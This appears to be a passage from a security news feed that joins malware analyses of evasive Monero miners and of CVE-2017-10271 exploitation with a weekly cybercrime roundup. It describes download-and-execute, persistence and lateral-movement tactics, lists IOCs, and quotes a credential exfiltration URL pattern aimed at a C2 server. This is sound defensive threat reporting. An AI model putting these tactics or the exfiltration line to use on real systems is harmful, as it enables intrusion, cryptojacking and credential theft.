Figure 2. Decrypted binary blob with an embedded executable file.

Figure 2. Decrypted binary blob with an embedded executable file.

As the reader can imagine, we are always interested in discovering novel evasion techniques. With piqued curiosity, we decided to dive into the code a bit further.

Payload

After peeling off all encryption layers, we finally reached the unpacked payload (see Figure 3). As expected, we found quite a number of anti-analysis techniques.

Figure 3. The unpacked payload

Figure 3. The unpacked payload (sha1: 43f84e789710b06b2ab49b47577caf9d22fd45f8) as found in VT.

The most classic trick (shown in Figure 4) merely checked for known anti-analysis processes. For example, Process Explorer, Process Monitor, etc., are all tools used to better understand which processes are running, how they are spawned, and how much CPU resources are consumed by each executing thread. This is a pretty standard technique to hide from such monitoring tools, and it has been used by other crypto miners as well. As we will see, others were a bit more exotic.

Figure 4. Detecting known process monitoring tools

Figure 4. Detecting known process monitoring tools via GetWindowTextW.

Evasion Technique – Lack of User Input

This technique specifically targets dynamic analysis systems. It tries to detect whether it is executing on a real host by measuring the amount of input received by the operating system. Admittedly, this is not that rare, and we indeed covered it before in a previous article describing some evasion techniques as used by ransomware.

Figure 5. Detecting sandbox by checking the last user input

Figure 5. Detecting sandbox by checking the last user input via GetLastInputInfo.

Figure 5 shows the logic in more details: the code measures the time interval between two subsequent inputs. Anything longer than one minute is considered an indicator that the binary is running inside a sandbox. Note that besides being prone to false positives, this technique can easily be circumvented simulating random user interactions.

Evasion Technique – Multicast IcmpSendEcho

The second anti-analysis technique that we investigated delays the execution via the IcmpCreateFile and IcmpSendEcho APIs. As it is further detailed in Figure 6, they are used to ping a reserved multicast address (224.0.0.0) with a timeout of 30 seconds. Ideally, as no answer is meant to be returned (interestingly enough we have knowledge of some devices erroneously replying to those ICMP packets), the IcmpSendEcho API has the side effect of pausing the executing thread for 30 seconds.

Figure 6. Delaying the execution via IcmpSendEcho API.

Figure 6. Delaying the execution via IcmpSendEcho API.

It’s worth noticing that a similar trick has been previously used by some infected CCleaner samples. In that case, the malicious shellcode was even going a step further by checking if the timeout parameter was being patched in an attempt to accelerate execution (and thus counter the anti-analysis technique).

Conclusions

Any dynamic analysis system wishing to cope with advanced evasive malware must be able to unpack layers of encryption and counter basic anti-analysis techniques. In Figure 7 we can see all the behaviors extracted when fully executing the original sample: the final payload is recognized as a variant of the XMRig Monero CPU Miner, and its network traffic correctly picked up and marked as suspicious.

Figure 7. Lastline analysis of the XMRig CPU miner.

Figure 7. Lastline analysis of the XMRig CPU miner.

Nevertheless it is quite worrying that anti-analysis techniques are becoming this mainstream. So much so that they started to turn into a standard feature of potentially unwanted applications (PUA) as well, including crypto-miners. Hopefully, it is just an isolated case, and not the first of a long series of techniques borrowed from the ransomware world.

Appendix – IOCs

Attached below the reader can find all the hashes related to this analysis, including the mutex identifying this specific strain, and the XMR wallet.

Sha1 (sample): d86c1606094bc9362410a1076e29ac68ae98f972
Sha1 (payload): 43f84e789710b06b2ab49b47577caf9d22fd45f8
Mutex: htTwkXKgtSjskOUmArFBjXWwLccQgxGT
Wallet: 49ptuU9Ktvr6rBkdmrsxdwiSR5WpViAkCXSzcAYWNmXcSZRv37GjwMBNzR7sZE3qBDTnwF9LZNKA8Er2JBiGcKjS6sPaYxY

The post Evasive Monero Miners: Deserting the Sandbox for Profit appeared first on Lastline.

CVE-2017-10271 Used to Deliver CryptoMiners: An Overview of Techniques Used Post-Exploitation and Pre-Mining

Introduction

FireEye researchers recently observed threat actors abusing CVE-2017-10271 to deliver various cryptocurrency miners.

CVE-2017-10271 is a known input validation vulnerability that exists in the WebLogic Server Security Service (WLS Security) in Oracle WebLogic Server versions 12.2.1.2.0 and prior, and attackers can exploit it to remotely execute arbitrary code. Oracle released a Critical Patch Update that reportedly fixes this vulnerability. Users who failed to patch their systems may find themselves mining cryptocurrency for threat actors.

FireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public posting of proof of concept code in December 2017. Attackers then leveraged this vulnerability to download cryptocurrency miners in victim environments.

We saw evidence of organizations located in various countries – including the United States, Australia, Hong Kong, United Kingdom, India, Malaysia, and Spain, as well as those from nearly every industry vertical – being impacted by this activity. Actors involved in cryptocurrency mining operations mainly exploit opportunistic targets rather than specific organizations. This coupled with the diversity of organizations potentially affected by this activity suggests that the external targeting calculus of these attacks is indiscriminate in nature.

The recent cryptocurrency boom has resulted in a growing number of operations – employing diverse tactics – aimed at stealing cryptocurrencies. The idea that these cryptocurrency mining operations are less risky, along with the potentially nice profits, could lead cyber criminals to begin shifting away from ransomware campaigns.

Tactic #1: Delivering the miner directly to a vulnerable server

Some tactics we've observed involve exploiting CVE-2017-10271, leveraging PowerShell to download the miner directly onto the victim’s system (Figure 1), and executing it using ShellExecute().


Figure 1: Downloading the payload directly

Tactic #2: Utilizing PowerShell scripts to deliver the miner

Other tactics involve the exploit delivering a PowerShell script, instead of downloading the executable directly (Figure 2).


Figure 2: Exploit delivering PowerShell script

This script has the following functionalities:

  • Downloading miners from remote servers


Figure 3: Downloading cryptominers

As shown in Figure 3, the .ps1 script tries to download the payload from the remote server to a vulnerable server.

  • Creating scheduled tasks for persistence


Figure 4: Creation of scheduled task

  • Deleting scheduled tasks of other known cryptominers


Figure 5: Deletion of scheduled tasks related to other miners

In Figure 4, the cryptominer creates a scheduled task with name “Update service for Oracle products1”.  In Figure 5, a different variant deletes this task and other similar tasks after creating its own, “Update service for Oracle productsa”.  

From this, it’s quite clear that different attackers are fighting over the resources available in the system.

  • Killing processes matching certain strings associated with other cryptominers


Figure 6: Terminating processes directly


Figure 7: Terminating processes matching certain strings

Similar to scheduled tasks deletion, certain known mining processes are also terminated (Figure 6 and Figure 7).

  • Connects to mining pools with wallet key


Figure 8: Connection to mining pools

The miner is then executed with different flags to connect to mining pools (Figure 8). Some of the other observed flags are: -a for algorithm, -k for keepalive to prevent timeout, -o for URL of mining server, -u for wallet key, -p for password of mining server, and -t for limiting the number of miner threads.

  • Limiting CPU usage to avoid suspicion


Figure 9: Limiting CPU Usage

To avoid suspicion, some attackers are limiting the CPU usage of the miner (Figure 9).

Tactic #3: Lateral movement across Windows environments using Mimikatz and EternalBlue

Some tactics involve spreading laterally across a victim’s environment using dumped Windows credentials and the EternalBlue vulnerability (CVE-2017-0144).

The malware checks whether its running on a 32-bit or 64-bit system to determine which PowerShell script to grab from the command and control (C2) server. It looks at every network adapter, aggregating all destination IPs of established non-loopback network connections. Every IP address is then tested with extracted credentials and a credential-based execution of PowerShell is attempted that downloads and executes the malware from the C2 server on the target machine. This variant maintains persistence via WMI (Windows Management Instrumentation).

The malware also has the capability to perform a Pass-the-Hash attack with the NTLM information derived from Mimikatz in order to download and execute the malware in remote systems.

Additionally, the malware exfiltrates stolen credentials to the attacker via an HTTP GET request to: 'http://<C2>:8000/api.php?data=<credential data>'.

If the lateral movement with credentials fails, then the malware uses PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to scan that particular host to determine if its vulnerable to EternalBlue, and uses it to spread to that host.

After all network derived IPs have been processed, the malware generates random IPs and uses the same combination of PingCastle and EternalBlue to spread to that host.

Tactic #4: Scenarios observed in Linux OS

We’ve also observed this vulnerability being exploited to deliver shell scripts (Figure 10) that have functionality similar to the PowerShell scripts.


Figure 10: Delivery of shell scripts

The shell script performs the following activities:

  • Attempts to kill already running cryptominers


Figure 11: Terminating processes matching certain strings

  • Downloads and executes cryptominer malware


Figure 12: Downloading CryptoMiner

  • Creates a cron job to maintain persistence


Figure 13: Cron job for persistence

  • Tries to kill other potential miners to hog the CPU usage


Figure 14: Terminating other potential miners

The function shown in Figure 14 is used to find processes that have high CPU usage and terminate them. This terminates other potential miners and maximizes the utilization of resources.

Conclusion

Use of cryptocurrency mining malware is a popular tactic leveraged by financially-motivated cyber criminals to make money from victims. We’ve observed one threat actor mining around 1 XMR/day, demonstrating the potential profitability and reason behind the recent rise in such attacks. Additionally, these operations may be perceived as less risky when compared to ransomware operations, since victims may not even know the activity is occurring beyond the slowdown in system performance.

Notably, cryptocurrency mining malware is being distributed using various tactics, typically in an opportunistic and indiscriminate manner so cyber criminals will maximize their outreach and profits.

FireEye HX, being a behavior-based solution, is not affected by cryptominer tricks. FireEye HX detects these threats at the initial level of the attack cycle, when the attackers attempt to deliver the first stage payload or when the miner tries to connect to mining pools.

At the time of writing, FireEye HX detects this activity with the following indicators:

Detection Name

POWERSHELL DOWNLOADER (METHODOLOGY)

MONERO MINER (METHODOLOGY)

MIMIKATZ (CREDENTIAL STEALER)

Indicators of Compromise

MD5

Name

3421A769308D39D4E9C7E8CAECAF7FC4

cranberry.exe/logic.exe

B3A831BFA590274902C77B6C7D4C31AE

xmrig.exe/yam.exe

26404FEDE71F3F713175A3A3CEBC619B

1.ps1

D3D10FAA69A10AC754E3B7DDE9178C22

2.ps1

9C91B5CF6ECED54ABB82D1050C5893F2

info3.ps1

3AAD3FABF29F9DF65DCBD0F308FF0FA8

info6.ps1

933633F2ACFC5909C83F5C73B6FC97CC

lower.css

B47DAF937897043745DF81F32B9D7565

lib.css

3542AC729035C0F3DB186DDF2178B6A0

bootstrap.css

Thanks to Dileep Kumar Jallepalli and Charles Carmakal for their help in the analysis.

Weekly Cyber Risk Roundup: Cryptocurrency Attacks and a Major Cybercriminal Indictment

Cryptocurrency continued to make headlines this past week for a variety of cybercrime-related activities.

2018-02-10_ITT.pngFor starters, researchers discovered a new cryptocurrency miner, dubbed ADB.Miner, that infected nearly 7,000 Android devices such as smartphones, televisions, and tablets over a several-day period. The researchers said the malware uses the ADB debug interface on port 5555 to spread and that it has Mirai code within its scanning module.

In addition, several organizations reported malware infections involving cryptocurrency miners. Four servers at a wastewater facility in Europe were infected with malware designed to mine Monero, and the incident is the first ever documented mining attack to hit an operational technology network of a critical infrastructure operator, security firm Radiflow said. In addition, Decatur County General Hospital recently reported that cryptocurrency mining malware was found on a server related to its electronic medical record system.

Reuters also reported this week on allegations by South Korea that North Korea had hacked into unnamed cryptocurrency exchanges and stolen billions of won. Investors of the Bee Token ICO were also duped after scammers sent out phishing messages to the token’s mailing list claiming that a surprise partnership with Microsoft had been formed and that those who contributed to the ICO in the next six hours would receive a 100% bonus.

All of the recent cryptocurrency-related cybercrime headlines have led some experts to speculate that the use of mining software on unsuspecting users’ machines, or cryptojacking, may eventually surpass ransomware as the primary money maker for cybercriminals.


2018-02-10_ITTGroups

Other trending cybercrime events from the week include:

  • W-2 data compromised: The City of Pittsburg said that some employees had their W-2 information compromised due to a phishing attack. The University of Northern Colorado said that 12 employees had their information compromised due to unauthorized access to their profiles on the university’s online portal, Ursa, which led to the theft of W-2 information. Washington school districts are warning that an ongoing phishing campaign is targeting human resources and payroll staff in an attempt to compromise W-2 information.
  • U.S. defense secrets targeted: The Russian hacking group known as Fancy Bear successfully gained access to the email accounts of contract workers related to sensitive U.S. defense technology; however, it is uncertain what may have been stolen. The Associated Press reported that the group targeted at least 87 people working on militarized drones, missiles, rockets, stealth fighter jets, cloud-computing platforms, or other sensitive activities, and as many as 40 percent of those targeted ultimately clicked on the hackers’ phishing links.
  • Financial information stolen: Advance-Online is notifying customers that their personal and financial information stored on the company’s online platform may have been subject to unauthorized access from April 29, 2017 to January 12, 2018. Citizens Financials Group is notifying customers that their financial information may have been compromised due to the discovery of a skimming device found at a Citizens Bank ATM in Connecticut. Ameriprise Financial is notifying customers that one of its former employees has been calling its service center and impersonating them by using their name, address, and account numbers.
  • Other notable events:  Swisscom said that the “misappropriation of a sales partner’s access rights” led to a 2017 data breach that affected approximately 800,000 customers. A cloud repository belonging to the Paris-based brand marketing company Octoly was erroneously configured for public access and exposed the personal information of more than 12,000 Instagram, Twitter, and YouTube personalities. Ron’s Pharmacy in Oregon is notifying customers that their personal information may have been compromised due to unauthorized access to an employee’s email account. Partners Healthcare said that a May 2017 data breach may have exposed the personal information of up to 2,600 patients. Harvey County in Kansas said that a cyber-attack disrupted county services and led to a portion of the network being disabled. Smith Dental in Tennessee said that a ransomware infection may have compromised the personal information of 1,500 patients. Fresenius Medical Care North America has agreed to a $3.5 million settlement to settle potential HIPAA violations stemming from five separate breaches that occurred in 2012.

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of those “newly seen” targets, meaning they either appeared in SurfWatch Labs’ data for the first time or else reappeared after being absent for several weeks, are shown in the chart below.

2018-02-10_ITTNew

Cyber Risk Trends From the Past Week

2018-02-10_RiskScoresA federal indictment charging 36 individuals for their role in a cybercriminal enterprise known as the Infraud Organization, which was responsible for more than $530 million in losses, was unsealed this past week. Acting Assistant Attorney General Cronan said the case is “one of the largest cyberfraud enterprise prosecutions ever undertaken by the Department of Justice.”

The indictment alleges that the group engaged in the large-scale acquisition, sale, and dissemination of stolen identities, compromised debit and credit cards, personally identifiable information, financial and banking information, computer malware, and other contraband dating back to October 2010. Thirteen of those charged were taken into custody in countries around the world.

As the Justice Department press release noted:

Under the slogan, “In Fraud We Trust,” the organization directed traffic and potential purchasers to the automated vending sites of its members, which served as online conduits to traffic in stolen means of identification, stolen financial and banking information, malware, and other illicit goods.  It also provided an escrow service to facilitate illicit digital currency transactions among its members and employed screening protocols that purported to ensure only high quality vendors of stolen cards, personally identifiable information, and other contraband were permitted to advertise to members.

ABC News reported that investigators believe the group’s nearly 11,000 members targeted more than 4.3 million credit cards, debit cards, and bank accounts worldwide. Over its seven-year history, the group inflicted $2.2 billion in intended losses and more than $530 million in actual losses against a wide range of financial institutions, merchants, and individuals.

 

Swisscoin [SIC] cryptocurrency spam

Swisscoin is a fairly low-volume self-styled cryptocurrency that has been the target of a Necurs-based spam run starting on Saturday 13th January, and increasing in volume to huge levels on Monday. From:    Florine Fray [Fray.419@redacted.tld] Date:    15 January 2018 at 10:51 Subject:    Could this digital currency actually make you a millionaire? Every once in a while, an opportunity comes